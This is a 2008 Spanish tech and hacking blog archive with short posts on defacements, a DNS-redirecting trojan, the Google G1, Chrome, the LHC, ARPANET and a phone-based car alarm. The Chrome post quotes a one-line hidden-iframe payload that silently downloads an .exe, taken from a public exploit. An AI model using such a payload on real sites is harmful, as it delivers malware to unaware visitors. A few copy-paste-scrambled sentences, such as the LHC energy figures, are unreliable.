domingo, 28 de diciembre de 2008

Algunas webs peruanas sufrieron defacement (ataques Mexicanos e Iranis)



La última semana han sufrido defacement algunas páginas web peruanas conocidas. Una de ellas fue el sitio de Panamericana Televisión (www.pantel.com.pe), donde todo deja indicar que se trató un ataque que aprovechó alguna vulnerabilidad de inyección SQL.
Mirror: defacement www.bailandoporunsueno.pe

A la vez, fue vulnerada la página web del conocido programa "Bailando por un Sueño" (www.bailandoporunsueno.pe), al parecer por atacantes mexicanos.
Mirror: defacement www.pantel.com.pe

Por otra parte, también sufrieron defacement algunas sitios de la "Sociedad Peruana de Computación" (www.spc.org.pe), al parecer por algún atacante Iraní. Este atacante dejó el siguiente contenido en las páginas que fueron sus víctimas dentro del dominio de la SPC:


viernes, 28 de noviembre de 2008

MovieCommander - Con Redirección de DNS

MovieCommander - Con Redirección de DNS

Todos los días nacen nuevos virus, y todos los días se crean nuevas curas para virus ya maduritos, por lo cual hacer una noticia por cada uno sería una pérdida del tiempo.

El tema está cuando un virus, tiene una característica que podría traernos más problemas de lo que nosotros estamos acostumbrados, y esta podría ser… la redirección de DNS.

Y, ¿qué problema particular tiene la redirección de los DNS? Simple, todo el tráfico que sale de nuestras PCs, pasa por un servidor que está tomado por personas con no-tan-buenas intenciones, por lo que nosotros no veremos ningún cambio en nuestra navegación, pero todos los datos que enviemos en la navegación de las páginas (incluídos passwords, cookies recibidas, etc) podrían pasar por dicha PC ya que la misma, a su vez, nos puede redireccionar a un Proxy que actúa como intermediador para tomar los datos de forma transparente.

Este es el caso de un virus que está in-the-wild, o sea, recorriendo las redes actualmente, que tiene como principal característica que se acomoda dentro de los DNS para que nosotros naveguemos por donde ellos quieren.

El virus fue asumido por McAfee como un troyano, ya que el mismo se instala con autorización del usuario, haciendole creer que el mismo le ayudará a encontrar archivos de películas (de ahí el nombre).

El troyano se instala en la carpeta %system32% de Windows, y actúa como rootkit en teoría.

Uno de los usos que se le está dando actualmente para aprovecharse del troyano, es el cambio de las redes de publicidad que se montan en los sitios, redirigiendolas a las publicidades que tienen dichas personas con malas intenciones, de modo que si bien no están aprovechandose de claves y demás (aunque podrían, pero no se ha informado nada), sacan provecho en términos monetarios por las publicidades brindadas.

Aún así, no hay que perder de mira que si navegan por sitios de Bancos, puedan tener la no-tan-grata sorpresa de que luego les falta dinero, y ustedes nunca hayan notado nada raro, porque como dije anteriormente, el cambio es invisible al usuario final.


ZTIC: Dispositivo USB para transacciones bancarias seguras

ZTIC: Dispositivo USB para transacciones bancarias seguras
29 de October 2008 | Federico Almada | 
Categorías:General 

El laboratorio de investigación de Zurich, de IBM, ha dado a conocer un dispositivo USB para añadir una nueva capa de seguridad, a la hora de hacer transacciones bancarias por medio de Internet.

El dispositivo llamado ZTIC (Zone Trusted Information Channel), se conecta mediante el puerto USB, creando un canal directo y seguro (por medio de TLS/SSL) con el servidor de transacciones en línea del banco. De este modo, se evita que el uso del ordenador mismo -que puede estar infectado con malware-, nos convierta en víctimas de un robo virtual.

Una vez que el usuario ingresa en su cuenta de banco, este puede validar todas las transacciones que haga por medio de la pantalla del dispositivo, el cual nos permitirá ver el monto que se debitará, logrando así evitar ataques del tipo man-in-the-middle, que podrían hacer creer al usuario que una transacción no fue manipulada (ya que en el navegador todo aparece “bien”, pero luego… el resumen de nuestro banco no dice lo mismo).

El dispositivo cuenta con un nivel extra de seguridad, al tener una ranura para ingresar una tarjeta inteligente, lo cual disminuirá potencialmente el riesgo de convertirnos en víctima.

Lo mejor de todo, es que el sistema puede ser integrado por los bancos, sin modificación alguna, lo que hace más probable que se termine implementando.

De momento, sólo se está probando en algunos bancos que son clientes de la firma.

Les dejo un vídeo, en inglés, con la explicación sobre como funciona:



miércoles, 8 de octubre de 2008

Google lanza su propio Celular superando a Iphone

El ingreso de Google en el mercado de los teléfonos celulares ha dejado de ser un rumor. El nuevo teléfono G1, desvelado esta semana por Google, inició una estrecha carrera con el iPhone de Apple, en un esfuerzo por captar parte del mercado de los llamados teléfonos "app" (de aplicaciones) - es decir, celulares que unen la telefonía inalámbrica normal con aplicaciones de datos.

Pero el G1 no será el mejor teléfono inalámbrico para todos. Mientras es claramente un competidor directo con el iPhone -en términos de apariencia, recursos y precio- se distancia del iPhone en importantes aspectos. ¿pero qué ofrece G1?

APLICACIONES
El G1 ha sido diseñado en todos sus detalles para funcionar con aplicaciones, tanto las populares "apps" de Google como las de terceros fabricantes. Google, por supuesto, tendrá la parte del león de aplicaciones ya listas al momento de lanzar el nuevo teléfono - desde Gmail y Google Maps hasta el creciente número de aplicaciones ofimáticas que ofrece en su suite de programas Google Docs. De acuerdo con esto, el G1 viene con un teclado - con juego de teclas estándar - algo más grande que la mayoría de los teléfonos celulares actuales. Este teclado deslizante se esconde bajo la pantalla LCD del teléfono cuando no está en uso. El teclado viene como agradable sorpresa para quienes nunca se pudieron habituar a los teclados "virtuales" de que están provistos otros celulares, tal como el iPhone de Apple. El teclado servirá muy bien para lo que bien puede ser la mayor sorpresa del G1: su sistema operativo de código abierto, llamado Android, para el cual todo desarrollador con conocimientos necesarios podrá crear aplicaciones nuevas. Compare usted esto con la política propietaria de Apple, con su sistema operativo iPhone, y se sentirá tentado a recordar el golpe que Apple recibió de computadoras compatibles con IBM hace muchos años, cuando Apple insistió en rechazar que terceros fabricantes desarrollaran hardware y software compatible con sus computadoras. La política de Google con Android resultará sin duda alguna en una lluvia de aplicaciones para su nuevo G1. El aspecto negativo de esto, puesto que Google tiene escaso control sobre desarrolladores ajenos a sus filas, es que la calidad de esas aplicaciones puede ser muy variable. En todo caso, a quienes usan los programas actuales de Google les agradará constatar qué bien trabajan éstos en el G1. En el nuevo teléfono, Google Maps, por ejemplo, funciona de maravillas. El uso de la vista calllejera (Street View) de Google Maps - que proporciona una visión real de los los barrios de una ciudad, a nivel de calles - facilita estupendamente la búsqueda de un destino en particular. ERGONOMIA Mientras el G1 se centra en aplicaciones que sugieren que el aparato ha sido hecho para amantes del teclado tradicional, los aficionados a las pantallas táctiles tampoco estarán decepcionados. La LCD del G1 es una pantalla táctil que puede usted usar para navegar en Internet y para usar muchos programas. El uso del teclado suele ser completamente opcional. En cuanto a diseño, el G1 es comparable en tamaño al iPhone de Apple, aunque el aparato de Google es algo más alto y más grueso. El G1 se siente en las manos sin duda alguna más ligero, más plástico que el iPhone. La interfaz Android se ve moderna y atractiva, más similar a una interfaz de sobremesa Windows en miniatura que la interfaz única y altamente táctil del iPhone, que trata de convertirse en extensión de la natural capacidad humana de ajustar las cosas con las propias manos. Tal como el iPhone, el G1 ofrece todo el paquete de recursos que se puede esperar de un moderno teléfono celular de último modelo: Wi-Fi, un navegador Web, un reproductor de audio, una cámara digital integrada, juegos, numerosas aplicaciones, GPS y correo electrónico. Notablemente, la cámara digital del G1 tiene una resolución de 3.2 megapíxeles, frente a los 2 megapíxeles del iPhone. No obstante, hay aspectos en los cuales el G1 simplemente no da tanto como el iPhone. La batería del G1, lamentablemente, tiene una vida de sólo 130 horas standby, mientras la del iPhone dura 300 horas, y la memoria básica del G1 es de 1 gigabyte (1 GB), mientras la del iPhone es de 8 GB. La memoria del G1 puede ser incrementada a 8 GB, mientras la del iPhone puede expandirse a 16 GB. El G1 tampoco tiene capacidad de ver vídeos directamente (streaming) como el iPhone, pese a que en el G1 se puede ver YouTube. El G1 tampoco tiene la posibilidad de sincronización con el PC. Por el contrario, Google espera que sea el usuario mismo quien sincronice sus contactos y calendarios a través de la web. Esto constituirá un obstáculo para quienes por su trabajo estén ligados a los servidores de Microsoft Exchange - es decir, al correo y el programa de administración de contactos de Outlook. El iPhone de Apple, por el contrario, es capaz de sincronizar con Outlook, con el añadido de actualización gratuita del software. Usuarios del G1 pueden sincronizar con GMail, el servicio de correo de Google, pero, a decir verdad, no hay muchas oficinas que reposen en GMail como principal servicio de correo. Curiosamente, el G1 carece asimismo de conexión para audífono. A cambio de ello, tendrá usted que usar la única conexión USB en el teléfono para conectar allí un audífono especial USB o recurrir a la ayuda de un adaptador USB de 3.5 mm para poder usar audífonos convencionales. Para peor de males, el único puerto USB del G1 se usa también para recargar electricidad, oír audio y sincronizar USB. Sobra decir que el G1 no será un reemplazo "plug-and-play" para el iPod u otro reproductor mediático portátil.

CONCLUSION
La estrecha vinculación del G1 con el creciente número de aplicaciones de Google y su sistema operativo de código abierto le granjeará las simpatías de quienes están ya vinculados a las aplicaciones de Google. Atraerá asimismo a tecnófilos que disfrutan probando múltiples añadidos y quieran tener a disposición un amplio repertorio de aplicaciones. Por otra parte, la apertura de G1 a desarrolladores de todo el mundo quiere decir que puede haber problemas con los controles de calidad, y que, en último término, quien acabe sufriendo sea el usuario. El G1, en breve, apelará a los amantes de los artilugios y a los guerreros de la tecnología. Quienes quieran un producto que simplemente funcione preferirán apostar por el altamente controlado iPhone de Apple.


jueves, 11 de setiembre de 2008

Creando los autos de Fast Furious

Primero tenemos al Mitsubishi Eclipse una maravilla de auto:



Y ahora el Toyota Supra q es otro de los preciosos carros de esta gran pelicula:

Matrix fue la pelicula que inspiró a muchos Hackers

¿Quien no recuerda a Matrix? una película que inspiró a muchos hackers y que hoy se han convertido en jefes de seguridad informática. www.Hack-Lover.Blogspot.com les trae un extracto de una de las películas vista por muchos jóvenes aficionados al mundo de la informatica.


miércoles, 3 de setiembre de 2008

Nuevo Navegador Google Chrome Beta

Cuando no han pasado ni 24 horas desde que Google presentó su navegador web Google Chrome, ya se ha reportado la primera vulnerabilidad. Google Chrome es propenso al mismo problema que Safari hace unos meses, al “carpet bombing“, una vulnerabilidad llamada así por el investigador Aviv Raff que puede ser utilizada para descargar automáticamente archivos cuando el usuario navega por una página maliciosa. Raff ha publicado una prueba de concepto en la que se demuestra que los usuarios de Chrome pueden ser engañados para descargar y ejecutar archivos JAR sin ninguna advertencia de la aplicación, para ello se aprovecha de un fallo en el Webkit y un error de Java. Para que el exploit tenga éxito tan sólo se requiere que la víctima haga dos clic, lo cual se puede lograr con un poco de ingeniería social. Google Chrome está basado en Webkit, el problema es que el navegador de Google utiliza una versión anterior de este motor que es vulnerable. Por ahora la compañía del popular buscador no ha comentado nada al respecto, pero esperemos que pronto se publique una actualización.
Ahora podemos hablar de otra vulnerabilidad que han discutido mucho en la lista de full disclosure, se supone que una funcion importante de este navegador es que si crashea solo crashea una pestania.. bueno si ustedes escriben o visitan un link que contenga :% (dos puntos porciento) crashearan todas las tabs.
(fuente: http://evilfingers.com/advisory/google_chrome_poc.php)

Si entran con Chrome a la direccion de Aviv Raff del CarpetBombing:
http://raffon.net/research/google/chrome/carpet.html
Les creara un .JAR en su escritorio (o directorio de downloads default) el JAR es un Notepad en Java, pero podria ser cualquier cosa.

Se publico hace poco una variacion de este ataque que permite la descarga automatica de cualquier archivo pueden encontrar la info en http://milw0rm.com/exploits/6355 el codigo es el siguiente:


document.write('< src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');

A pesar de los bug que pudiera tener lo analizamos bien y podemos decir que lo primero que notamos al abrirlo es su diseño minimalista. Bien por Google. Chrome es para navegar por Internet, no necesita tener un aspecto espectacular, ni efectos raros que consumen demasiados recursos al ordenador entorpeciendo su rendimiento. No obstante, el aspecto es más que suficiente.

Chrome lo muestra todo en una sola pantalla: búsqueda web (con Google, claro), historial, barra direcciones, etc. Además, la carga de páginas es mucho más rápida que con otros navegadores. Nosotros lo hemos comprobado, pero algunas webs lo han constatado gráficamente. Especialmente destaca en la ejecución de JavaScripts, es mucho más velozversión beta 8), Firefox 3 o Safari 3. que otros como Explorer (incluyendo su última

La navegación se hace por pestañas, como casi todos los actuales, pero aquí cada una es un proceso independiente. De esta forma, si una se bloquea, se puede cerrar sólo esta pestaña sin afectar al navegador al completo.

Por si fuera poco, es multiproceso, es decir, cada pestaña trabaja de manera independiente, agilizando la carga de las páginas sin estar afectadas por el resto. Así, se puede ver un vídeo en Youtube en una pestaña, mientras en otra se carga otra página, a la vez que nos bajamos un fichero. Todo esto sin que una tarea interfiera en la otra, ganando así mayor velocidad y estabilidad.

En este sentido es muy interesante el Gestor de tareas que incorpora Chrome. Se abre presionando Mayúsculas+Escape En él se puede ver lo que está consumiendo cada pestaña y determinados elementos de las webs, de forma que en un momento dado podemos finalizar el proceso que ralentice nuestra máquina.

El sistema de Favoritos y el Historial es prácticamente el mismo que el que utiliza Firefox por lo que los usuarios de éste estarán familiarizados con el funcionamiento. Los favoritos están en la parte derecha de la barra de marcadores. Se puede ocultar pulsando Ctrl+B. Al historial se accede mediante la combinación de teclas Ctrl+H.

El tema de la seguridad está muy cuidado. Primero, Chrome descarga periódicamente un par de listas negras (de phishing y spam) y avisa si las detecta mientras navegamos. Además, cada pestaña está preparada para impedir la instalación de software sin permiso del usuario (sandboxing). Por último tenemos el modo Incognito, que permite navegar, desde una pestaña, por Internet con la total seguridad de que no se registran nuestras actividades ni tampoco acepta cookies.

Sobre la compatibilidad con los estándares web, malas noticias. De momento esta versión beta no supera el test Acid3, uno de los más usados para analizar estos temas, aunque es cierto que su puntuación supera la de otros como Firefox 3 y IE 7.

Esta versión no tiene aún plugins, pero los tendrá. Es de esperar que siga la línea de Firefox, con plugins de la compañía y otros realizados por particulares pero supervisados.

No hay todavía disponible versión para Linux y Mac OS X, pero Google ya ha anunciado que está trabajando en ello y saldrán, aunque no ha querido mencionar ninguna fecha.

Como conclusión, estamos ante un navegador con un futuro muy prometedor, y que va a poner en serios apuros a los dos grandes: MS Internet Explorer y Mozilla Firefox. Chrome apuesta por la velocidad y estabilidad en la navegación y ha sabido coger lo mejor de la competencia y mejorarlo sin introducir demasiados cambios de navegación reduciendo así el esfuerzo de aprendizaje del usuario.

viernes, 29 de agosto de 2008

INTEL ya tiene su moto

Hola muchachos les comento que INTEL ya a mandado a crear su propia moto con la mas alta tecnologia en motos, cuenta con 4 pistones que son dos motores que funcionan separadamente pero te hacen correr como uno solo, de igual manera dos carburadores y todo esto con una simbologia al CORE 2 DUO además cuenta con una computadora para encederla que sólamente lo puede hacer el dueño ya que cuenta con un sistema donde la llave de ensendido es la huella digital del propietario. así mismo la velocidad la temperatura es graficada en una pantalla LCD delante del piloto, realmente una maravilla. pueden verla aqui junto con sus creadores muy conocidos.





viernes, 22 de agosto de 2008

Alarma para tu vehiculo con un Nokia 3310

Este brico es para la gente que deja el coche o vehiculo en los alrededores de pubs o discotecas los findes. Tengas o no alarma te vale este "inventillo" (con alarma sería más efectivo).
Yo voy a explicarlo rapidamente para un vehiculo que no tenga alarma. El objetivo es que el vehiculo "te llame" si abren una de las puertas del coche. Como sabeis, la luz de cortesía del coche se puede poner en 3 posiciones, pues la que debemos poner es la que enciende las luces cuando se abren las puertas, ya que será el que activará el movil que llevaremos en el maletero. Si tienes doble cierre puesto no te podran abrir las puertas por lo que esto no valdrá a no ser que tengas alarma y la conectes al rele que activa el movil.


Los materiales que necesitamos son:
- Móvil que permita rellamada y marcación rápida. Yo lo explicaré para un Nokia 3310 (uno que tenía por ahi sin usar). Si tienes uno y no te vale porque esta sin liberar, mandame un sms y te lo intentare liberar por IMEI Gratis.- Tarjeta prepago con saldo, a poder ser con el saldo suficiente para que no salgan diciendo el mensaje que no tienes saldo.- Cables y conectores.- Relé pequeño, yo usaré lo más chico que he encontrado, rele 12v y 10A, 4,5€ mas o menos.- Soldador de estaño y estaño.

Con todo eso podremos montar una mini alarma que no sonará, pero que te avisará que han abierto tu coche, o sea, muy mala señal si tu no estas delante del coche.
EXPLICACION: Lo único que haremos es un mecanismo mediante relé a la luz de cortesia que simule la pulsación de una tecla del telefono, la cual active la marcación rápida y llame al nº que tenga asignado esa tecla. PROBADO!.

1.- Tirar un cable doble desde la luz de cortesia al maletero (SIN QUE SE VEA).2.- Conectar el cable de la luz de cortesia al rele.3.- Quitamos las carcasas al movil y los 6 tornillos q tiene en el lado de la pantalla, con eso podremos quitar el display completo y veremos la placa de telefono. La placa del telefono tiene la parte del teclado formada por conjuntos de circulo-punto que son las teclas del telefono. Elegimos la tecla que querramos activar (ejemplo, el 4) y le soldamos un cable al circulo y otro al punto que esta dentro del circulo, con esto conseguiremos activar la tecla si juntamos los cables, o sea, si cerramos el circuito. (POR AHI SALDRA UNA FOTO CON EL CABLE SOLDADO A LA PLACA DE TELEFONO EN LA TECLA *, me equivoqué... jeje, y la tube q cambiar!!)4.- Ahora tapamos el punto metálico (plastico blanco que está detras del display) del display con cinta aislante para que no haga contacto con los cables que acabamos de soldar.5.- Atornillamos de nuevo el display, con cuidado y colocando el cable que sobresale.6.- Montamos teclado y carcasas.7.- Activamos la marcación rápida y la rellamada automática y asignas tu número de telefono a la tecla donde hemos doldado los cables. Puedes usar cualquier tecla desde la 2 a la 9.8.- Conectamos los cables que hemos soldado en el telefono a la otra parte del relé. Y YA ESTA! ATENCIÓN: Para que funcione todo bien, el telefono tiene que estar con el teclado desbloqueado!.

FUNCIONAMIENTO: Al abrir una puerta se encenderá la luz de cortesia y a su vez el relé cerrará el circuito de la tecla elegida en la placa del telefono, que simulará la pulsación prolongada en el telefono que activará la marcación rapida y llamará a tu número de movil, alertandote que alguien ha abierto tu coche.
Sencillo y muy útil.

Si también quieres que se cargue la bateria del movil puedes soldar un par de cables en las dos chapitas de cobre que tiene el telefono al lado del conector de carga del cargador de red que suministra nokia y lo conectais a una toma de 5v.

martes, 8 de julio de 2008

En los proximos dias se activará el LHC

En los proximos dias se activará el LHC que es el acelerador de partículas más grande del mundo. El nuevo acelerador funcionará a 271 grados centígrados bajo cero y usa el túnel de 27 km de circunferencia creado para el Gran Colisionador de Electrones y Positrones (LEP en inglés). A diferencia del acelerador primeramente concebido, en el nuevo colisionarán protones (un tipo de hadrón) en vez de electrones y positrones (leptones).


La principal meta de su rediseño es encontrar la evasiva particula másica conocida como el bosón de Higgs (a menudo llamada "la partícula de Dios"). La observación científica de éste podría explicar cómo el resto de partículas elementales ganan la masa que explica la teoría de la relatividad especial y rellenar el ansiado hueco libre en el Modelo estándar.

El LHC es un proyecto de tamaño inmenso y una enorme, y potencialmente peligrosa, tarea de ingeniería. Mientras esté encendido, la energía total almacenada en los imanes es 10 gigajuliosmegajulios. La pérdida de sólo un 10-7 en el haz es suficiente para iniciar un 'quench' (un fenómeno cuántico en el que una parte del superconductor puede perder la superconductividad). En este momento, toda la energía del haz puede disiparse en ese punto, lo que es equivalente a una explosión. y en el haz 725

El 25 de octubre de 2005, un técnico murió en un accidente en el túnel del LHC cuando una carga cayó sobre él accidentalmente.

El 9 de abril de 2007, un error matemático en el diseño de los imanes y de las sujeciones por parte del laboratorio Fermilab provocó una explosión que obligó a cambiar o reparar los 24 imanes que rodean el Gran Colisionador de Hadrones.

Desde que se proyectó el Gran Colisionador Relativista de Iones (RHIC), dentro y fuera de la comunidad científica se han escuchado voces de alarma sobre la posibilidad de que el funcionamiento del LHC desencadene procesos que, teóricamente, serían capaces de provocar la destrucción de la Tierra o incluso del Universo.

Estos posibles procesos catastróficos son:

* La creación de un agujero negro estable
* La creación de materia exótica supermasiva, tan estable como la materia ordinaria.
* La creación de monopolos magnéticos (previstos en la teoría de la relatividad) que pudieran catalizar el decaimiento del protón
* La activación de la transición a un estado de vacío cuántico.

A este respecto, el CERN ha realizado estudios sobre la posibilidad de que se produzcan acontecimientos desastrosos como microagujeros negros, redes, o disfunciones magnéticas. Radiación de Hawking, sin daño para las instalaciones. Sin embargo, no hay unanimidad en la comunidad científica sobre la exactitud de la teoría de Stephen Hawking.


martes, 1 de julio de 2008

Viaje a Huancaya 2008 2da parte

Aqui esta la segunda parte del viaje a Huancaya con la gente del Club Niva sino pudieron ver la 1era parte aqui les dejo el link
Pero ahora disfruten la segunda parte del Increible viaje a Huancaya
.


domingo, 29 de junio de 2008

El comienzo de lo que hoy conocemos como internet se llamaba: ARPANET

Arpanet fue el origen de Internet como lo conocemos hoy en dí­a. Sus inicios están absolutamente relacionados con la Guerra Frí­a que asoló Europa durante la segunda mitad del siglo pasado.

La red Arpanet nació en mil novecientos sesenta y nueve como resultado de un proyecto de investigación del Departamento de Defensa norteamericano, que trataba de encontrar una ­a de comunicación alternativa a la comunicación a través de radio, ya que se preveí­a que en el caso de una guerra nuclear, temor con fundamento en aquella época, las comunicaciones por radio se verí­an fuertemente afectadas.

Arpanet estaba fundamentada en una red compuesta por diferentes ordenadores en la que todos los nodos tení­an la misma importancia, consiguiendo así­, que en el caso de que alguno de ellos se veí­a manipulado o quedaba deteriorado, la red no se veí­a afectada. La clave de Arpanet estaba en que los datos eran enviados mediante diferentes rutas, confluyendo finalmente en un mismo punto de destino. De esta forma, la información se desgranaba en pequeñas unidades que eran enviadas a través de la ruta menos ocupada, para reunirse en el punto de destino. Con ello se conseguí­a la no existencia de ningún control centralizado, por lo que la seguridad de las comunicaciones aumentaba.

Las investigaciones que concluyeron en el desarrollo final de Arpanet fueron desarrolladas, principalmente, por la Universidad de California (UCLA), aunque la financiación vino, casi exclusivamente del Pentágono norteamericano. El principal obstáculo con el que se encontró el desarrollo de la red fue la interconexión de diferentes ordenadores, provenientes de diferentes creadores y con diferentes sistemas de comunicación. Esto se resolvió con la estandarización de los protocolos de comunicación, surgiendo así­ los TCP/IP (transmisión control protocol/internet protocol), clave en el desarrollo de la red Internet posteriormente.

Poco a poco, Arpanet fue creciendo y más centros de investigación se fueron adscribiendo a la nueva red de comunicación. Así­, en 1971 nació el primer programa de correo electrónico, mientras que en 1972 surgió la nomenclatura arroba (@). Se calcula que entorno a 1973, alrededor del setenta y cinco por ciento del tráfico de Arpanet estaba basado en correos electrónicos.

En 1983, Arpanet se unió a otro tipo de redes más locales, dando lugar a la actual Internet, que, poco a poco, se fue desarrollando y creciendo en número de usuarios. Así­, en 1990, cuando Arpanet dejó de existir, poca gente se apercibió de este hecho, debido a la gran expansión conseguida por su sustituto, Internet.

Entonces, lo que en un principio fue un proyecto militar, encaminado a proteger las comunicaciones en caso de conflicto nuclear, se convirtió, finalmente, en el invento que ha cambiado la forma de comunicación de la sociedad actual. Se puede decir, por tanto, que Internet le debe a Arpanet su existencia.

Cuadro practico sobre: PetaByte, TeraBytes, GigaBytes, MB, KB, Kb, bits

1 bit1 Byte = 8 bits
1 KiloByte (KB) = 1,024 Bytes
1 MegaByte (MB) = 1,024 KB
1 GigaByte (GB) = 1,024 MB
1 TeraByte (TB) = 1,024 GB
1 PetaByte (PB) = 1,024 TB
1 ExaByte (EB) = 1,024 PB
1 ZettaByte (ZB) = 1,024 EB
1 YottaByte (YB) = 1,024 ZB
1 XeraByte (XB) = 1,024 YB


Y adicionalmente para los que no estubimos 3 decadas atras:


1 bit1 Nibble = 4 bits
1 Byte = 2 Nibles = 8 bits
1 Word = 2 Bytes = 16 bits
1 Long Word = 4 Bytes = 32 bits


para las personas que no son técnicas y que quieren tener un sentido de la relación de estas escalas en el mundo real, 1 Byte (8 bits) es suficiente para almacenar (con un poco de espacio de sobra) una letra de nuestro idioma, así como numerales y otros símbolos. Esto significa que en 1 KB de memoria puedes almacenar 1,024 Bytes, o 1,024 letras, y en 1 MB puedes almacenar 1,024 veces esa cantidad, es decir, 1,024 KB, o 1,048,576 letras.

El mundo de la Ingenieria Informatica segirá avanzando para siempre tratando de almacenar la mayor cantidad de datos en un espacio menos reducido que el anterior, asi como también el manejo de esa cantidad de datos a una velocidad siempre inmediata, tratando de emular asi el equivalente del cerebro humano y hasta tal vez su reemplazo algún dia.

viernes, 27 de junio de 2008

Una verdadera quemada de llanta

Aqui les dejo un pequeño video de una verdadera quemada de llantas, ¿quien dijo que las 4x4 no queman llantas? y yo me pregunto ¿y el tanque de gasolina ?

El experimento ruso del perro sin cabeza

La historia, detrás de estos videos, es más o menos la siguiente: a principios de la década de 1920, un científico ruso llamado Sergei Brukhonenko habría sido capaz de cortar la cabeza de un perro, y mantenerla viva. En esa época ya existían evidencias de que una cabeza seccionada mantenía “cierta actividad” relacionada con la vida durante unos cuantos segundos después de ser cortada. Brukhonenko se dedico a extender este tiempo.

El video siguiente muestra la forma en que, aparentemente, lo logró. Básicamente, una maquina se encarga de hacer circular sangre fresca por la cabeza seccionada, al tiempo que retira la sangre sin oxigeno.



Puede verse como la cabeza reacciona a diferentes estímulos, incluso abriendo los ojos y la boca. Según la historia, Brukhonenko presentó sus experimentos en una conferencia internacional sobre fisiología en 1928. Sin embargo, en www.HACK-LOVER.Blogspot.com nos suena a “fake”.

Lo primero que uno puede preguntarse es por qué no hay información más reciente sobre este tipo de experimentos. Y existen al menos dos razones por la que esto puede haber desaparecido de la prensa.

La primera es que solo se haya tratado de una campaña propagandística rusa, destinada a demostrar a occidente su increíble capacidad técnica, mediante una serie de videos trucados. El hecho de que el video tenga créditos en ingles al final podría indicar que estaban dirigidos al “mercado norteamericano”. Al fin y al cabo, más tarde, durante la guerra fría, se enviaban a la prensa cosas más raras aún.

¿Es posible mantener viva una cabeza separada de su cuerpo?

La otra posibilidad es que simplemente se trate de la obra de algún bromista. Los que navegamos todos los días por Internet vemos todo el tiempo noticias falsas pero dotadas de una “patina de verdad” destinada a hacerlas medianamente creíbles. Vamos, ¡si hemos visto desde como cargar un iPod con una cebolla, hasta la autopsia de un extraterrestre!

Aún suponiendo que pueda mantenerse un cerebro vivo dentro de una cabeza separada de su cuerpo, difícilmente pudiese encontrarse en un estado de consciencia. Tampoco resulta demasiado convincente la forma en que la cabeza se mueve, como intentando levantarse de la mesa. Ese tipo de movimientos, sin un cuerpo, resulta imposible.

Por ultimo, si no era un experimento secreto (Brukhonenko, recordemos, lo hizo público en 1928), a lo largo de casi un siglo se hubiesen hecho increíbles adelantos en esa técnica, y tendríamos un presente lleno de cabezas dentro de frascos, como en Futurama. ¿Tu que crees?

Desarollan un nuevo chip, tan eficiente que podría funcionar con el calor corporal

Mejor diseño de los circuitos y baterías ya permiten aparatos mas pequeños y móviles, pero simplemente cambiar una batería puede no ser una opcion para ciertas aplicaciones médicas o militares. Los investigadores militares, que ayudaron a financiar la investigación, están ansiosos de aumentar la duración de sus aparatos en el campo o, incluso, eliminar la necesidad de "cambiar las baterías".

"Diseñar un chip de bajo consumo es complicado" explica el profesor Chandrasakan, "lo primero en dejar de funcionar es la memoria, hay que rediseñarla junto con la lógica para que puedan soportar la variación". Trabajar con voltajes bajos hace necesarios cambios drásticos de diseño. Por ejemplo, una celda de memoria que normalmente se hace con 6 transistores en un chip de bajo consumo requiere 8. Los investigadores afirman que los nuevos chips podrían verse en los campos médico y militar en los próximos 5 años.

Un técnico de Intel comenta que uno de los sacrificios mas grandes a hacerse en chips de bajo voltaje es la frecuencia de reloj de los mismos. Para comparar, el chip de menor consumo de Intel en este momento consume algo menos de 2 watts, el procesador de la MacBook Air unos 17 watts y el chip del equipo del MIT consume entre 1 y 100 microwatts.

Con los problemas actuales de contaminación y cambio climático solo podemos esperar que estos ahorros lleguen lo antes posible, sobre todo porque menos energía consumida significa menos calor y menos energía para disipar dicho calor.

Implante de neuronas de silicio, a la vuelta de la esquina

El uso médico de chips neurales para el tratamiento de desórdenes mentales y problemas de memoria es el objetivo principal del plan de Ted Berger, que ha creado el primer implante de memoria. Ted cree que puede revolucionar el mundo de la medicina. Un cable delgado une una aguja y un pequeño chip de silicio sobre la mesa de trabajo. Se cierra un interruptor, y una serie de pequeñas ondas danzan en una pantalla. Uno de los científicos explica que el chip está enviando pulsos eléctricos a trozo de cerebro a través de la aguja. Lo que vemos en la pantalla es la respuesta del cerebro a ese estímulo. “Y son idénticas en forma y frecuencia a las enviadas por el chip.”, aclara Srinvasan, uno de los empleados de Berger. “Dicho en otros términos, el chip se esta comunicando como una parte más del cerebro”

El equipo de Berger ha montado esta demostración para mostrar a la prensa una pequeña ventana al futuro de la neurología. El hecho de que un chip sea capaz de “conversar” con células cerebrales es un importantísimo primer paso. Abre la puerta a la posibilidad de implantar maquinaria en el cerebro, capaz de, por ejemplo, mejorar nuestra memoria o brindarnos nuevas habilidades. El grupo de Berger esta compuesto por profesionales de áreas muy diversas, tales como matemáticos, neurólogos, ingenieros informáticos y bioingenieros de todo el país. El chip que están probando es capaz de simular unas 12.000 neuronas, una pequeñísima parte de las mas de 100 mil millones que tiene un cerebro humano. Pero no está nada mal para ser un prototipo. “Este es el tipo de ciencia que pude cambiar el mundo”, dice uno de ellos.

sábado, 31 de mayo de 2008

Viaje a Huancaya (1era parte) con el CLUB NIVA PERU increible!!!

Hola como estan todos, aqui lanzamos el video de lo que se vivió de el viaje a Huancaya desde el TEAM U.R.S.S y todo lo que se vivió y pasamos y aqui ustedes podran ver la niva que se preparó para el viaje y que en entradas anteriores posteamos.

Bueno fue una experiencia realmente increible, valio la pena cualquier esfuerzo que se hizo, y realmente la Niva URSS respondió a la gravedad del asunto bajo el frio y el calor. Ahora estamos preparandonos nuevamente para realizar otra pronta salida para Julio hacia Huaraz, si alguno de ustedes cuenta con una Niva o una 4x4 pues ya sabe que hacer la reunión es todos los jueves a las 10:00 pm en el Trigal - Surco estan todos invitados.

Sin hacerlos esperar mas aqui esta la primera parte del viaje que duró 4 dias; donde aprendimos más de lo que se imaginan.


lunes, 26 de mayo de 2008

Visita a Vilca en Yauyos 2008 con el CLUB NIVA

Hola muchachos este es el primer video lanzado a la red del el viaje a Huancaya, y este video es de la parada en el pueblo de Vilca con todo el Club NivaPeru pueden visitar su pagina en WWW.NIVAPERU.COM


viernes, 23 de mayo de 2008

D.O.M Team 5 de ellos arrestados (DOM Team es uno de los mas grandes grupos de Hackers del planeta)

Detenidos en España cinco de los 'hackers' más activos del mundo, dos de ellos menores

* Firmaban sus ataques con los seudónimos 'ka0x, an0de, xarnuz y Piker'
* Dos de ellos son hermanos y otros dos tienen sólo 16 años
* Vivían en Sabadell, Burgos, Málaga y Valencia y se coordinaban a través de Internet
* Habían atacado más de 21.000 páginas y ocupaban el 5º puesto en un ránking mundial
